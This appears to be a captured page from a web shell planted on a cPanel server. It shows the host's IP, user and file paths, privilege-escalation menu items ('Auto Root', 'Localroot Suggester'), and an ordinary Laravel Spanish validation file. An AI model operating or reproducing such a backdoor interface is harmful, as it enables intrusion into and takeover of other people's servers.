Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
oishifashion /
ap.tsgbd.com /
aa /
lang /
es /
Delete
Unzip
Name
Size
Permission
Date
Action
account.php
2.21
KB
-rw-r--r--
2025-02-06 04:37
auth.php
648
B
-rw-r--r--
2025-02-06 04:37
barcode.php
2.35
KB
-rw-r--r--
2025-02-06 04:37
brand.php
518
B
-rw-r--r--
2025-02-06 04:37
business.php
4.37
KB
-rw-r--r--
2025-02-06 04:37
cash_register.php
1.17
KB
-rw-r--r--
2025-02-06 04:37
category.php
712
B
-rw-r--r--
2025-02-06 04:37
contact.php
1.44
KB
-rw-r--r--
2025-02-06 04:37
expense.php
1.35
KB
-rw-r--r--
2025-02-06 04:37
home.php
853
B
-rw-r--r--
2025-02-06 04:37
invoice.php
3.03
KB
-rw-r--r--
2025-02-06 04:37
lang_v1.php
87.92
KB
-rw-r--r--
2025-02-06 04:37
messages.php
1.56
KB
-rw-r--r--
2025-02-06 04:37
pagination.php
539
B
-rw-r--r--
2025-02-06 04:37
passwords.php
860
B
-rw-r--r--
2025-02-06 04:37
printer.php
953
B
-rw-r--r--
2025-02-06 04:37
product.php
2.54
KB
-rw-r--r--
2025-02-06 04:37
purchase.php
2.81
KB
-rw-r--r--
2025-02-06 04:37
receipt.php
703
B
-rw-r--r--
2025-02-06 04:37
report.php
3.24
KB
-rw-r--r--
2025-02-06 04:37
restaurant.php
4.51
KB
-rw-r--r--
2025-02-06 04:37
role.php
3.34
KB
-rw-r--r--
2025-02-06 04:37
sale.php
2.43
KB
-rw-r--r--
2025-02-06 04:37
stock_adjustment.php
835
B
-rw-r--r--
2025-02-06 04:37
tax_rate.php
1011
B
-rw-r--r--
2025-02-06 04:37
tooltip.php
8.11
KB
-rw-r--r--
2025-02-06 04:37
unit.php
501
B
-rw-r--r--
2025-02-06 04:37
user.php
1.37
KB
-rw-r--r--
2025-02-06 04:37
validation.php
6.97
KB
-rw-r--r--
2025-02-06 04:37
Save
Rename
<?php return [ /* |-------------------------------------------------------------------------- | Validation Language Lines |-------------------------------------------------------------------------- | | The following language lines contain the default error messages used by | the validator class. Some of these rules have multiple versions such | as the size rules. Feel free to tweak each of these messages. | */ 'accepted' => ':attribute debe ser aceptado.', 'active_url' => ':attribute no es una URL válida.', 'after' => ':attribute debe ser una fecha posterior a :date.', 'after_or_equal' => ':attribute debe ser una fecha posterior o igual a :date.', 'alpha' => ':attribute sólo debe contener letras.', 'alpha_dash' => ':attribute sólo debe contener letras, números y guiones.', 'alpha_num' => ':attribute sólo debe contener letras y números.', 'array' => ':attribute debe ser un conjunto.', 'before' => ':attribute debe ser una fecha anterior a :date.', 'before_or_equal' => ':attribute debe ser una fecha anterior o igual a :date.', 'between' => [ 'numeric' => ':attribute tiene que estar entre :min - :max.', 'file' => ':attribute debe pesar entre :min - :max kilobytes.', 'string' => ':attribute tiene que tener entre :min - :max caracteres.', 'array' => ':attribute tiene que tener entre :min - :max ítems.', ], 'boolean' => 'El campo :attribute debe tener un valor verdadero o falso.', 'confirmed' => 'La confirmación de :attribute no coincide.', 'date' => ':attribute no es una fecha válida.', 'date_format' => ':attribute no corresponde al formato :format.', 'different' => ':attribute y :other deben ser diferentes.', 'digits' => ':attribute debe tener :digits dígitos.', 'digits_between' => ':attribute debe tener entre :min y :max dígitos.', 'dimensions' => 'Las dimensiones de la imagen :attribute no son válidas.', 'distinct' => 'El campo :attribute contiene un valor duplicado.', 'email' => ':attribute no es un correo válido', 'exists' => ':attribute es inválido.', 'file' => 'El campo :attribute debe ser un archivo.', 'filled' => 'El campo :attribute es obligatorio.', 'image' => ':attribute debe ser una imagen.', 'in' => ':attribute es inválido.', 'in_array' => 'El campo :attribute no existe en :other.', 'integer' => ':attribute debe ser un número entero.', 'ip' => ':attribute debe ser una dirección IP válida.', 'ipv4' => ':attribute debe ser un dirección IPv4 válida', 'ipv6' => ':attribute debe ser un dirección IPv6 válida.', 'json' => 'El campo :attribute debe tener una cadena JSON válida.', 'max' => [ 'numeric' => ':attribute no debe ser mayor a :max.', 'file' => ':attribute no debe ser mayor que :max kilobytes.', 'string' => ':attribute no debe ser mayor que :max caracteres.', 'array' => ':attribute no debe tener más de :max elementos.', ], 'mimes' => ':attribute debe ser un archivo con formato: :values.', 'mimetypes' => ':attribute debe ser un archivo con formato: :values.', 'min' => [ 'numeric' => 'El tamaño de :attribute debe ser de al menos :min.', 'file' => 'El tamaño de :attribute debe ser de al menos :min kilobytes.', 'string' => ':attribute debe contener al menos :min caracteres.', 'array' => ':attribute debe tener al menos :min elementos.', ], 'not_in' => ':attribute es inválido.', 'numeric' => ':attribute debe ser numérico.', 'present' => 'El campo :attribute debe estar presente.', 'regex' => 'El formato de :attribute es inválido.', 'required' => 'El campo :attribute es obligatorio.', 'required_if' => 'El campo :attribute es obligatorio cuando :other es :value.', 'required_unless' => 'El campo :attribute es obligatorio a menos que :other esté en :values.', 'required_with' => 'El campo :attribute es obligatorio cuando :values está presente.', 'required_with_all' => 'El campo :attribute es obligatorio cuando :values está presente.', 'required_without' => 'El campo :attribute es obligatorio cuando :values no está presente.', 'required_without_all' => 'El campo :attribute es obligatorio cuando ninguno de :values estén presentes.', 'same' => ':attribute y :other deben coincidir.', 'size' => [ 'numeric' => 'El tamaño de :attribute debe ser :size.', 'file' => 'El tamaño de :attribute debe ser :size kilobytes.', 'string' => ':attribute debe contener :size caracteres.', 'array' => ':attribute debe contener :size elementos.', ], 'string' => 'El campo :attribute debe ser una cadena de caracteres.', 'timezone' => 'El :attribute debe ser una zona válida.', 'unique' => ':attribute ya ha sido registrado.', 'uploaded' => 'Subir :attribute ha fallado.', 'url' => 'El formato :attribute es inválido.', /* |-------------------------------------------------------------------------- | Custom Validation Language Lines |-------------------------------------------------------------------------- | | Here you may specify custom validation messages for attributes using the | convention "attribute.rule" to name the lines. This makes it quick to | specify a specific custom language line for a given attribute rule. | */ 'custom' => [ 'password' => [ 'min' => 'La :attribute debe contener más de :min caracteres', ], 'email' => [ 'unique' => 'El :attribute ya ha sido registrado.', ], ], /* |-------------------------------------------------------------------------- | Custom Validation Attributes |-------------------------------------------------------------------------- | | The following language lines are used to swap attribute place-holders | with something more reader friendly such as E-Mail Address instead | of "email". This simply helps us make messages a little cleaner. | */ 'attributes' => [ 'name' => 'nombre', 'username' => 'usuario', 'email' => 'correo electrónico', 'first_name' => 'nombre', 'last_name' => 'apellido', 'password' => 'contraseña', 'password_confirmation' => 'confirmación de la contraseña', 'city' => 'ciudad', 'country' => 'país', 'address' => 'dirección', 'phone' => 'teléfono', 'mobile' => 'móvil', 'age' => 'edad', 'sex' => 'sexo', 'gender' => 'género', 'year' => 'año', 'month' => 'mes', 'day' => 'día', 'hour' => 'hora', 'minute' => 'minuto', 'second' => 'segundo', 'title' => 'título', 'content' => 'contenido', 'body' => 'contenido', 'description' => 'descripción', 'excerpt' => 'extracto', 'date' => 'fecha', 'time' => 'hora', 'subject' => 'asunto', 'message' => 'mensaje', ], ];